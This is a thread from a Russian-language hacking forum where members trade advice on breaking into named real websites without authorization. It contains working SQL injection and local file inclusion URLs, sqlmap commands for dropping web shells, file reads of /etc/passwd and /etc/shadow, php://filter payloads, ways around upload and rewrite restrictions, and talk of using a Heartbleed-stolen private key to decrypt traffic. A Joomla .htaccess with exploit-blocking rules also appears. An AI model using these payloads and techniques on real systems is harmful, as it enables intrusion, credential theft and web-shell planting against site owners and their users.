Да! Уже понял, что selinux или apparmor (особенно учитывая что ось убунта). Имеющиеся php-файлы редактировать не могу. Полный запрет на запись php файлов при наличии прав на запись. Перловые скрипты не выполняются. Питон еще конечно попробую, но крайне мало вероятно.


хм то есть шелл какой никакой есть?

сессии то апач куда то пишет, ну конечно это могут быть всякие редисы, но может и файлы, тогда в файл сессии можно записать что нужно, а потом проинклудить, может нужно найти диру доступную для записи( типа /tmp ), то есть на диры сайта может и стоят 777, но вполне возможен какой нибудь chattr +i и ппц

php работает как модуль или cgi? неплохо было бы скидывать phpinfo в таких случаях хотя бы. обходить disable_functions пробовали?

Грабитель said:
↑ (https://antichat.live/posts/3960673/)
Парни, подскажите по одной непростой SQL иньекции:
http://www.profclinic.ru/search/?search_string=[rand]
'
Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.
Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).
Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.
Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.


результат запроса видимо кешируется, поэтому при повторной обращении с таким же запросом скули нет

в sqlmap есть макрос для рандомизации параметра

python sqlmap.py -u 'http://www.profclinic.ru/search/?search_string=1234567890qwertyuiopasdfghjklzxcvbn m' --randomize=search_string

рандомить он будет из символов "1234567890qwertyuiopasdfghjklzxcvbnm", можно указать другие если нужно

мда пробел и запятая фильтруется, вместо некоторых спецсимволов и вовсе подставляется знак %

валидный запрос удалось составить, но данные как извлечь не придумал

http://www.profclinic.ru/search/?se...2cczxceferg555dfwergtwevvvttr')||(select(1)) # (http://www.profclinic.ru/search/?search_string=tetrrzzr2342cczxceferg555dfwergtwev vvttr%27)||(select(1))%23)

ребят, нужна помощ.

Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?

Пробовал без sqlmapа UNION SELECT '' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов

1pman said:
↑ (https://antichat.live/posts/3961851/)
ребят, нужна помощ.
Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?
Пробовал без sqlmapа UNION SELECT '' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов


так проблема в нахождении диры доступной на запись или в ограничении в 8 символов?

вообще если есть одна скуля, то скорее всего есть и другая это в плане ограничений

на счет диры рекомендую пройтись хотя бы каким нибудь сканером, тем же nikto например https://cirt.net/Nikto2 и попробовать залить в найденные диры

1pman said:
↑ (https://antichat.live/posts/3961851/)
ребят, нужна помощ.
Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?
Пробовал без sqlmapа UNION SELECT '' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов


Я не особо понял в чем проблема. В любом случае в sqlmap можно указывать путь куда загружать шелл если задаешь параметр --os-shell (sqlmap сам предлагает ввести каталог). По поводу формы логина: там в html стоит ограничение на 8 символов или в скрипте? HTML можно в любом случае поправить если надо и убрать ограничения. Hope it helps.

t0ma5 said:
↑ (https://antichat.live/posts/3962036/)
так проблема в нахождении диры доступной на запись или в ограничении в 8 символов?
вообще если есть одна скуля, то скорее всего есть и другая
это в плане ограничений
на счет диры рекомендую пройтись хотя бы каким нибудь сканером, тем же nikto например
https://cirt.net/Nikto2
и попробовать залить в найденные диры




blackbox said:
↑ (https://antichat.live/posts/3962124/)
Я не особо понял в чем проблема. В любом случае в sqlmap можно указывать путь куда загружать шелл если задаешь параметр --os-shell (sqlmap сам предлагает ввести каталог). По поводу формы логина: там в html стоит ограничение на 8 символов или в скрипте? HTML можно в любом случае поправить если надо и убрать ограничения. Hope it helps.


Диру открытую для записи я нашёл, даже несколько. ладно, фиг с ним, что скульмапа мне не предлагает самому указать путь куда заливать.

Я пошёл другим путём, решил залить его через --sql-shell и тут возникла проблема:


[WARNING] execution of custom SQL queries is only available when stacked queries are supported (я как понял, такие сложные запросы он не поддерживает или что?)
sql-shell> select user from mysql.user where file_priv='Y'
[05:08:20] [INFO] fetching SQL SELECT statement query output: 'select user from mysql.user where file_priv='Y''
[05:08:20] [INFO] the SQL query used returns 2 entries
[05:08:20] [INFO] resumed: root
[05:08:20] [INFO] resumed: root
select user from mysql.user where file_priv='Y' [1]:
root


Вообще все привилегии у пользователя есть исходя из --priv, попытался прочесть хоть какой-нибудь файл, а он мне выдает пустые в ответ. Нашёл другой сайт, такая же беда. Оба на линьке работают, может они настроены таким образом? вообще уже не знаю в какую сторону копать

Так же пробовал руками , при чтении файла пустая страница, все диры перебрал

Приветствую камрады.

На сайте есть форма для загрузки аватара, на вход принимает любой файл, но если загрузить php и попробовать его выполнить (даже пустой php файл), то выдает 500 External server error.

Сайт на Yii 2.0.5, имя вебшелла (и любого файла) кодируется md5+время, поэтому создать файл .htaccess (чтобы дать выполнение php или в html php кода) нет возможности. Если загрузить вебшелл без расширения, то содержимое просто выводиться на экран.

Пробовал загрузить jpg с прописанным в exif php кодом, не выполняется.

Подскажите какие варианты можно попробовать еще.

.SpoilerTarget" type="button">Spoiler: Код обработки загрузки аватара
public function upload()

{

if ($this->validate()) {

$avatarName = hash('md5', $this->avatar->baseName.''.time());

$this->avatar->saveAs('uploads/avatar/' . $avatarName . '.' . $this->avatar->extension);

$this->avatar = $avatarName.'.'.$this->avatar->extension;

return true;

} else {

return false;

}

}

Файл не записывается даже руками? Если обратится к нему через веб то файл не существует? Когда файлы вручную читаете то хексовое имя используете load_file(0x2f6574632f706173737764)? С таким в общем-то никогда не сталкивался, поэтому не знаю что сказать. Нужно проверить чтобы дира действительна была доступна на запись. Бывает еще что из-за настроек безопасности типа apparmor mysqld запрещено писать в каталоги кроме разрешенных (типа /var/tmp) и директория вроде бы доступна на запись, но файл там базой создать нельзя. Поэтому такая инъекция годится либо того чтобы из базы добыть логин:хеш и в админку заиметь доступ, либо в паре с каким-нибудь LFI.

возможно и правда из за настроек безопасности, ибо другие сайты с такой проблемой крутились на винде, либо домашнем пк, а тут они вообще пытались сами править код, но полностью не смогли убрать инъекцию и крутятся уже на норм хостингах. вычитал на забугорных форумах , упоминали как то тоже самое про безопасность. в общем вечером ещё смотреть буду...

если что- то получится, отпишусь.

1pman said:
↑ (https://antichat.live/posts/3962427/)
возможно и правда из за настроек безопасности, ибо другие сайты с такой проблемой крутились на винде, либо домашнем пк, а тут они вообще пытались сами править код, но полностью не смогли убрать инъекцию и крутятся уже на норм хостингах. вычитал на забугорных форумах , упоминали как то тоже самое про безопасность. в общем вечером ещё смотреть буду...
если что- то получится, отпишусь.


Для стандартной записи файла через скулю(SELECT код_шелла_в_HEX_или_в_кавычка� � FROM mysql.user INTO OUTFILE '/путь/файл') обязательно кавычки файла не должны фильтроваться(magic_quotes_* в PHP). Также возможно, что пути относительные, chroot или виндовые. Первым делом пробуйте прочитать файлы руками с кавычками и через hex, например load_file(0x2f6574632f706173737764) и load_file('/etc/passwd') - если первый прочитается, а второй нет, то наверняка фильтруются кавычки и стандартом не залить...

Всем добрый день. Уже как день ломаю голову: изучаю обычное переполнение буффера со срывом стека и исполнением шеллкода. Шелл проверен на нескольких си-программах - рабочий, /bin/sh. Сделал все по правилам: nop-shellcode-esp. Так вот, при переполнении осуществляется перезапись eip адресом esp. Но при переходе на перезаписанный адрес, вылетает ошибка segmentation fault, eip указывает на тот самый буфер(не хочет выполняться даже первая nop-инструкция). Может быть нужно отключить какую-нибудь службу или я что-то неправильно делаю при подмене адреса?(про неработоспособность шелла не пишите, он работает на всех Си-програмах). Помогите пожалуйста. Ubuntu x86

Выручайте, не могу понять в чем дело. Вот сама скуля: http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99 and 1=(SeLecT+@@version)-- (http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99%20and%201=(SeLecT+@@vers ion)--) Сделал дамп таблиц и полей, но не могу слить ни одну запись из таблицы "JB_users".

(http://medtonnew.conceptsite.co.il/...top+1+user_pass+'::'+user_id+from+JB_users)-- (http://medtonnew.conceptsite.co.il/downloader.asp?file_id=99+and+1=(select+top+1+user _pass%2b%27::%27%2buser_id+from+JB_users)--))

sqlmap тебе в помощь он крутит,только что проверил.

SaNDER said:
↑ (https://antichat.live/posts/3966985/)
Нееее,в sqlmapу у меня на прокси жалуется,мол прокси нужно . Так что помоги как-нибудь по другому .


да нет там ничего, с чего вы взяли что там уязвимость?

Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?

.Light. said:
↑ (https://antichat.live/posts/3967233/)
Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?


Поищи phpmyadmin

http://peterking.si.com/p.php?act=Function

Кто знает что это и с чем его едят?

RWD said:
↑ (https://antichat.live/posts/3967389/)
http://peterking.si.com/p.php?act=Function
Кто знает что это и с чем его едят?


Очень похож на шел

BabaDook said:
↑ (https://antichat.live/posts/3967452/)
Очень похож на шел


у меня таких много, если кто может помочь разобраться скину еще.

RWD said:
↑ (https://antichat.live/posts/3966992/)
да нет там ничего, с чего вы взяли что там уязвимость?


была там скуль, натравили наверно стопитцот sqlmap'ов -_- , всё уже закрыли

децл лога осталось, не обычная кстати скуль была....


Code:
curl 'https://mixdrop.ru/?ref=100/*fff*/'
Syntax error, unexpected token *, near to 'fff*/ AND ip = '*.*.*.*' LIMIT :APL0:', when parsing: SELECT [Ref].* FROM [Ref] WHERE user_id = 100/*fff*/ AND ip = '*.*.*.*' LIMIT :APL0: (90)
#0 [internal function]: Phalcon\Mvc\Model\Query->parse()
#1 [internal function]: Phalcon\Mvc\Model\Query->execute()
#2 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 100/*...')
#3 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 100/*...')
#4 [internal function]: GamesController->indexAction()
#5 [internal function]: Phalcon\Dispatcher->dispatch()
#6 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#7 {main}

curl 'https://mixdrop.ru/?ref=90+or+user_id=a()'
SQLSTATE[42000]: Syntax error or access violation: 1305 FUNCTION mixdrop.ru.a does not exist
#0 [internal function]: PDOStatement->execute()
#1 [internal function]: Phalcon\Db\Adapter\Pdo->executePrepared(Object(PDOStatement), Array, Array)
#2 [internal function]: Phalcon\Db\Adapter\Pdo->query('SELECT `ref`.`i...', Array, Array)
#3 [internal function]: Phalcon\Mvc\Model\Query->_executeSelect(Array, Array, Array)
#4 [internal function]: Phalcon\Mvc\Model\Query->execute()
#5 /var/www/admin/data/www/mixdrop.ru/app/models/Ref.php(13): Phalcon\Mvc\Model::findFirst('user_id = 90 o...')
#6 /var/www/admin/data/www/mixdrop.ru/app/controllers/GamesController.php(11): Ref::findFirst('user_id = 90 o...')
#7 [internal function]: GamesController->indexAction()
#8 [internal function]: Phalcon\Dispatcher->dispatch()
#9 /var/www/admin/data/www/mixdrop.ru/public/index.php(29): Phalcon\Mvc\Application->handle()
#10 {main}

BabaDook said:
↑ (https://antichat.live/posts/3967452/)
Очень похож на шел


очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно

сорцы если что https://github.com/jakehu/phpinfo-by-yahei/blob/master/tz.php

t0ma5 said:
↑ (https://antichat.live/posts/3967758/)
очень похож, но это скорее скрипт который показывает всякую серверную инфу, чекает функции и т.д., не нашел пока как через него залиться можно
сорцы если что
https://github.com/jakehu/phpinfo-by-yahei/blob/master/tz.php


Я тоже н не нашёл, ну я там особо не глядел, там есть коннект к БД. И Возможно, скорее всего залиться через него варианта не будет. Это как бы техничиский монитор

Закинул я шелл в upload : site.com/upload/shell

Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html

Сервер шелл не хочет открывать - такого файла у него нет .

Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.

Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .

Можно ли как-то победить rewrite или мертвый номер ?

Lazy said:
↑ (https://antichat.live/posts/3967812/)
Закинул я шелл в upload : site.com/upload/shell
Но админ переписал mod_rewrite так , что в урл к файлу прибавляется автоматом .html : site.com/upload/shell.html
Сервер шелл не хочет открывать - такого файла у него нет .
Я пробую добавить null byte после имени файла в браузере и теперь имя корректно.
Но фаил все равно не открывается . И даже открывать адрес site.com/index.html%00 сервер все равно не желает .
Можно ли как-то победить rewrite или мертвый номер ?


залить свой .htaccess в котором вырубить все модреврайты к чертям, или хедлер html->php добавить в .htaccess, ну это если есть возможность свой .htaccess загрузить

Увы но htaccess никак не войдет .

Остается или победить rewrite , или искать локальных инклудов . Хотя похоже их тоже негусто .

хм как же сайт работает, то есть если на сайте динамические элементы есть, формы там всякие, то php как то прикручен

надо глянуть в сорцы страницы с какой нить формой, что там?

Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.

http://www.mogalakwena.gov.za/index.php?page=/etc/passwd (http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00)%00

http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ (http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00)%00

В последнем случае нет вывода (

MDen1s said:
↑ (https://antichat.live/posts/3968480/)
Помогите с LFI. Есть сайт который инклудится на /etc/passwd , но я не могу проинклудить на /proc/self/envorin.
http://www.mogalakwena.gov.za/index.php?page=/etc/passwd (http://www.mogalakwena.gov.za/index.php?page=/etc/passwd%00)
%00
http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ (http://www.mogalakwena.gov.za/index.php?page=/proc/self/environ%00)
%00
В последнем случае нет вывода (


Файл недоступен

BabaDook said:
↑ (https://antichat.live/posts/3968482/)
Файл недоступен


А как-то можно проинклудить?

MDen1s said:
↑ (https://antichat.live/posts/3968701/)
А как-то можно проинклудить?


пробуйте другие способы, их огромное количество

1)


PHP:
http://www.mogalakwena.gov.za/index.php?page=php://filter/convert.base64-encode/resource=index

2) инклудить сессию

3)


PHP:
http://www.mogalakwena.gov.za/index.php?page=http://www.mogalakwena.gov.za/index.php?page=demographics%00

что ещё можно придумать ?

Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile

мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "

Подскажите что можно еще придумать?

https://translate.google.com/ в помощь

I love this game said:
↑ (https://antichat.live/posts/3968861/)
Есть root от phpmyadmin, знаю путь, пытаюсь залить шелл через select into outfile
мне выдает ошибку "#1 - Can't create/write to file 'путь/test.php' (Errcode: 13) "
Подскажите что можно еще придумать?


Попробуй в /tmp записать, возможно это проблема с правилами безопасности mysqld.

blackbox said:
↑ (https://antichat.live/posts/3968886/)
Попробуй в /tmp записать, возможно это проблема с правилами безопасности mysqld.


в /tmp пишется

I love this game said:
↑ (https://antichat.live/posts/3968916/)
в /tmp пишется


Значит, скорее всего, в другие папки писать не получится, даже если есть права на запись, потому что так настроен мускуль (но попробовать стоит). Можно попытаться найти lfi и использовать в паре с этой багой.

blackbox said:
↑ (https://antichat.live/posts/3968920/)
Значит, скорее всего, в другие папки писать не получится, даже если есть права на запись, потому что так настроен мускуль (но попробовать стоит). Можно попытаться найти lfi и использовать в паре с этой багой.


нельзя писать в директорию, но как вариант можно попробовать запись в существующий файл, вдруг права другие

t0ma5 said:
↑ (https://antichat.live/posts/3968922/)
нельзя писать в директорию, но как вариант можно попробовать запись в существующий файл, вдруг права другие


Mysql не пишет в сущестувющие файлы, будет выдана ошибка.

Попался сайт, frontiercoop.com в строке поиска скуль, PostgreSQL но изза WAF не могу раскрутить. sql map тоже не берет, ругается на WAF

А пасс от фтп,ssh или isp как-то можно прочитать?

I love this game said:
↑ (https://antichat.live/posts/3968938/)
А пасс от фтп,ssh или isp как-то можно прочитать?


Да, файлы же читать можно с помощью LOAD_FILE() и LOAD DATA INFILE. Но опять же, если есть права на чтение этих файлов.

А где хранятся пассы?

I love this game said:
↑ (https://antichat.live/posts/3968956/)
А где хранятся пассы?


в /etc/shadow

t0ma5 said:
↑ (https://antichat.live/posts/3969102/)
в /etc/shadow


Сюда нет доступа (

Какие еще есть варианты, готов заплатить за помощь!

I love this game said:
↑ (https://antichat.live/posts/3969129/)
Сюда нет доступа (
Какие еще есть варианты, готов заплатить за помощь!


сорцы сайта можно читать? читай его

I love this game said:
↑ (https://antichat.live/posts/3969129/)
Сюда нет доступа (
Какие еще есть варианты, готов заплатить за помощь!


хватит хэкать, в соседнем топике суицид сиськи постит))

Подскажите люди добрые.

Нашел heartbleed на одном сервере.

Восстановил RSA PRIVATE KEY с помощью утилиты heartleech.

На этом сертификате крутятся все поддомены сайта. Но они находятся на разных серваках.

Как можно перехватить весь чужой траффик https и расшифровывать с помощью приватного ключа. Доступ к сервакам не имею.

И вообще что можно сделать если у тебя имется приватный ключ?

http://www.sallatykka.com/web/index.php?id=21'+order+by+1 -- - (http://www.sallatykka.com/web/index.php?id=21%27+order+by+1%20--%20-)

Каким образом здесь можно получить вывод о количестве столбцов, если при order by 1 вылетает ошибка от mysql_fretch_array() ?

Есть инклуд, но не могу сделать RCE (

http://www.weidnermsmd.org/template.php?page=/var/log/nginx/access.log

SaNDER said:
↑ (https://antichat.live/posts/3970916/)
http://princessdisney.ru/index.php?...h1pass_recovery&auth_cn=Kiwi_Account_SelfAuth (http://princessdisney.ru/index.php?nid=Kiwi_Account_SelfAuth1pass_recovery&auth_cn=Kiwi_Account_SelfAuth)
просто кавычку подставил,и какая-то ошибка . Впервые такое вижу?Что это?


Ничего критичного )

Комрады,подскажите, что можно выжать из ситуации:

запрос: www.site.com/search?searchword=lala (http://www.site.com/search?searchword=lala)"+AND+9815%3D8835

Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50

Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода?

SQLmap не видит, что параметр уязвим.

semik said:
↑ (https://antichat.live/posts/3972480/)
Комрады,подскажите, что можно выжать из ситуации:
запрос:
www.site.com/search?searchword=lala (http://www.site.com/search?searchword=lala)
"+AND+9815%3D8835
Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50
Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода?
SQLmap не видит, что параметр уязвим.


в 20 символов вектора не подобрать для вывода

yarbabin said:
↑ (https://antichat.live/posts/3972481/)
в 20 символов вектора не подобрать для вывода


Спасибо, раскрутил через другой дырявый скрипт.

добрый всем день, вопрос по раскрутке уязвимости через мап, при попытке получения содержимого таблиц получаю следующеее...

osca'

[00:14:33] [WARNING] the SQL query provided does not return any output

[00:14:33] [INFO] fetching columns for table 'ev_evento_participante' in databas

e 'biman_pontemosca'

[00:14:33] [WARNING] the SQL query provided does not return any output

[00:14:33] [INFO] fetching columns for table 'ev_evento_colaborador' in database

'biman_pontemosca'

[00:14:33] [WARNING] the SQL query provided does not return any output

[00:14:33] [INFO] fetching columns for table 'fn_boleta' in database 'biman_pont

emosca'

как то можно это обойти? заранее спасибо

Есть раскрученная мапом инъекция. file-priv=no. Нашел полный путь до папки аплоад. CMS - joomla 1.5.15. Прочитал хеши паролей - думал начать брутить, но путь до админки редиректит на главную страницу - как обойти пока не нашел.

Есть ли впринципе варианты загрузки шелла через инъекцию без INTO OUTFILE? Поделитесь опытом - ситуация крайне распространенная.

Хелп

https://www.wendweb.de/з/

ошибка в русском символе !!! AND tx_realurl_pathsegment='з' !!!

semik said:
↑ (https://antichat.live/posts/3972838/)
Есть раскрученная мапом инъекция. file-priv=no. Нашел полный путь до папки аплоад. CMS - joomla 1.5.15. Прочитал хеши паролей - думал начать брутить, но путь до админки редиректит на главную страницу - как обойти пока не нашел.
Если ли впринципе варианты загрузки шелла через инъекцию без INTO OUTFILE? Поделитесь опытом - ситуация крайне распространенная.


Через инъёкцияю 80% что не залить шел, есть в инете инфа что при file-priv=no можно читать, но я не сталкивался лично с этим.

админки редиректит на главную страницу - тут методы проб и ошибок , только тыкать. как вариант ноу редирект

BabaDook said:
↑ (https://antichat.live/posts/3972854/)
Через инъёкцияю 80% что не залить шел, есть в инете инфа что при file-priv=no можно залить, но я не сталкивался лично с этим.
админки редиректит на главную страницу - тут методы проб и ошибок , только тыкать. как вариант ноу редирект


Спасибо, но куда тыкать =) в дампе базы посмотрел - путь до админки, вроде, штатный.


Как вариант ноу редирект


- тут не понял..


есть в инете инфа что при file-priv=no можно залить


Не кинешь ссылок - поверхностно ничего не нагуглил по этому поводу

Я тут обложался , возможна чтение , а не заливка

https://rdot.org/forum/showthread.php?t=741

ноу редирект, такой плагин есть для баузера, или в бурпе сделать запрос к станице и смотреть что будет

curl http://site/

Так же можно пробрутить директории папки администратор. Возможно надо идти не на интекс,

BabaDook said:
↑ (https://antichat.live/posts/3972869/)
Я тут обложался , возможна чтение , а не заливка
https://rdot.org/forum/showthread.php?t=741
ноу редирект, такой плагин есть для баузера, или в бурпе сделать запрос к станице и смотреть что будет
curl
http://site/
Так же можно пробрутить директории папки администратор. Возможно надо идти не на интекс,


Благодарю за наводку. Не знаешь, в sql-shell можно выполнять запросы такого типа? "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'" или только обычные user() version()?

semik said:
↑ (https://antichat.live/posts/3972871/)
Благодарю за наводку. Не знаешь, в sql-shell можно выполнять запросы такого типа? "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'" или только обычные user() version()?


можно, но при наличий прав

DezMond™ said:
↑ (https://antichat.live/posts/3972843/)
Хелп
https://www.wendweb.de/з/
ошибка в русском символе !!! AND tx_realurl_pathsegment='з' !!!


Не у кого нет ни каких предложений?

OxoTnik said:
↑ (https://antichat.live/posts/3972894/)
можно, но при наличий прав


Такое по-моему работает только если есть возможность множественные запросы выполнять, разве нет?

blackbox said:
↑ (https://antichat.live/posts/3973136/)
Такое по-моему работает только если есть возможность множественные запросы выполнять, разве нет?


верно

Нужна помощь:

Пытаюсь пройти по пути www.site.com/administrator/ (http://www.site.com/administrator/) в админку джумлы - редиректит на главную страницу. Предполагаю, что всему виной строка if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); } в файле /administrator/index.php. Не могу понять, какие куки ему скормить, чтобы пустило. Вычитал, что если убрать эту сроку из файла, редирект пропадет. Посоветуйте, как обойти. Есть доступ к БД на чтение через инъекцию. Предположил, что таблица jos_session как-то с этим связана. Просвятите - редко сталкивался с жумлой.

Вот пост с форума joomla-support.ru, который навел меня на эти мысли:

если вы не можете зайти в админку из-за постоянного редиректа на главную страницу, попробуйте открыть файл /administrator/index.php и там в самом начале должны быть строки на подобие этих

if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); }

удалите их и все будет ок!

semik said:
↑ (https://antichat.live/posts/3973314/)
Нужна помощь:
Пытаюсь пройти по пути
www.site.com/administrator/ (http://www.site.com/administrator/)
в админку джумлы - редиректит на главную страницу. Предполагаю, что всему виной строка if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); } в файле /administrator/index.php. Не могу понять, какие куки ему скормить, чтобы пустило. Вычитал, что если убрать эту сроку из файла, редирект пропадет. Посоветуйте, как обойти. Есть доступ к БД на чтение. Предположил, что таблица jos_session как-то с этим связана. Просвятите - редко сталкивался с жумлой.
Вот пост с форума joomla-support.ru, который навел меня на эти мысли:
если вы не можете зайти в админку из-за постоянного редиректа на главную страницу, попробуйте открыть файл /administrator/index.php и там в самом начале должны быть строки на подобие этих
if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); }
удалите их и все будет ок!


файлы через скуль можно читать? если да - прочитай administrator/index.php

а так честно говоря хз, может там вообще админка переименована во что нибудь adminasd908123, а редирект где нить в .htaccess прописан

на сайте кстати формы авторизации нет? может залогинится под админом на самом сайте, а там что нибудь прояснится

HTTP parameter pollution - с помощью этой уязвимости както можно залить шелл?

.Light. said:
↑ (https://antichat.live/posts/3973351/)
HTTP parameter pollution - с помощью этой уязвимости както можно залить шелл?


обход waf

http://raz0r.name/articles/http-parameter-pollution/

t0ma5 said:
↑ (https://antichat.live/posts/3973354/)
обход waf
http://raz0r.name/articles/http-parameter-pollution/


то есть это sql ?

.Light. said:
↑ (https://antichat.live/posts/3973356/)
то есть это sql ?


это особенность работы бэкенда, за счет чего можно передавать данные таким способом что они будут обходить определенные проверки

рекомендую таки прочитать статью

t0ma5 said:
↑ (https://antichat.live/posts/3973319/)
файлы через скуль можно читать? если да - прочитай administrator/index.php
а так честно говоря хз, может там вообще админка переименована во что нибудь adminasd908123, а редирект где нить в .htaccess прописан
на сайте кстати формы авторизации нет? может залогинится под админом на самом сайте, а там что нибудь прояснится


Файлы читать не могу. В базе джумлы разве нигде путь до админки не фиксируется?

Путь правильный - uniscan говорит файл site.com/administrator/index.php существует.

Вот содержимое файла htaccess с сайта:

##

# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $

# @package (https://antichat.live/members/206396/) Joomla

# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.

# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL

# Joomla! is Free Software

##

################################################## ###

# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE

#

# The line just below this section: 'Options +FollowSymLinks' may cause problems

# with some server configurations. It is required for use of mod_rewrite, but may already

# be set by your server administrator in a way that dissallows changing it in

# your .htaccess file. If using it causes your server to error out, comment it out (add # to

# beginning of line), reload your site in your browser and test your sef url's. If they work,

# it has been set by your server administrator and you do not need it set here.

#

################################################## ###

## Can be commented out if causes errors, see notes above.

Options +FollowSymLinks

#

# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits

## If you experience problems on your site block out the operations listed below

## This attempts to block the most common type of exploit `attempts` to Joomla!

#

## Deny access to extension xml files (uncomment out to activate)

#

#Order allow,deny

#Deny from all

#Satisfy all

#

## End of deny access to extension xml files

# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode data within the URL

RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

